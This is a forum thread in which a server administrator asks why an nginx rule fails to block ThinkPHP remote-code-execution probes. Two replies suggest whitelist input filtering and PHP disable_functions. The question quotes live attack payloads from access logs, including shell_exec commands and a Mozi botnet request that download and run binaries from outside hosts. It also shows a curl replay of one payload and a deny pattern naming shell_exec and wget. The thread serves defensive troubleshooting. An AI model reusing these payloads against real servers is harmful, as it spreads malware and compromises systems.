Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
F
F
fastboot2021-01-12 09:27:13
PHP
fastboot, 2021-01-12 09:27:13

Nginx 1.10 php exploit through GET arguments, how to fix?

Example:

{"status": "400","ip": "87.117.152.116","host": "vitko-core.ru","path": "/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://45.145.185.107/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'","referrer": "-","user_agent": "puzzles/2.0","length": 343,"generation_time_milli": 0.000,"date": "2021-01-12T06:14:30+02:00"}

Here is the request itself:
/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://45.145.185.107/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'


linux:
4.14.111 #1 SMP The Dec 19 15:23:22 CST 2019 armv7l armv7l armv7l  GNU/Linux

There are no updates for nginx, the available version is 1.10.

FILE /etc/nginx/sites-enabled/default
if ($request_uri ~* "call_user_array|shell_exec|wget") {
return 444;
}

when I'm in LAN via curl request, then the rule works - but the request from outside does not work?
curl -I --user-agent "Test" "http://192.168.255.249/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://45.145.185.107/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'"

but if you look at this log:
{"status": "444","ip": "112.163.119.159","host": "95.153.111.12","path": "/shell?cd+/tmp;rm+-rf+*;wget+http://112.163.119.159:33790/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws","referrer": "-","user_agent": "Hello, world","length": 0,"generation_time_milli": 0.000,"date": "2021-01-12T08:10:10+02:00"}

rule code 444 is already working here, but if you look at the trace. log:
{"status": "400","ip": "170.246.86.201","host": "vitko-core.ru","path": "/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.239.242.76/bns/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'","referrer": "-","user_agent": "puzzles/2.0","length": 343,"generation_time_milli": 0.000,"date": "2021-01-12T08:24:18+02:00"}

then the code is 400.
How to fix it?

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

2 answer(s)
Report
X
xmoonlight, 2021-01-12
@xmoonlight

Regex-filter of all input user data according to the "white" list solves all issues once and for all.
Edit the php script handler for routing all incoming requests and add filtering there.

Report
S
Slava Rozhnev, 2021-01-12
@rozhnev

You can disable the execution of "opious functions in PHP". Add the following line to php.ini:

# disable functions 
disable_functions=exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

Similar questions
I
Illia T2019-12-25 05:18:12
Why doesn't fadeIn() work? 2Reply
S
Sergey2015-09-14 23:53:18
Full video background how does it work? 2Reply
D
Dmitry Gusev2015-09-16 11:07:34
How to protect yourself from DDoS from YandexBot/3.0? 4Reply
B
BonBon Slick2020-01-24 15:28:26
How to adapt the width for tablets and wide screens? 2Reply
I
Ivan Ivanov2017-08-22 22:41:00
How to create a relationship between tables? 2Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question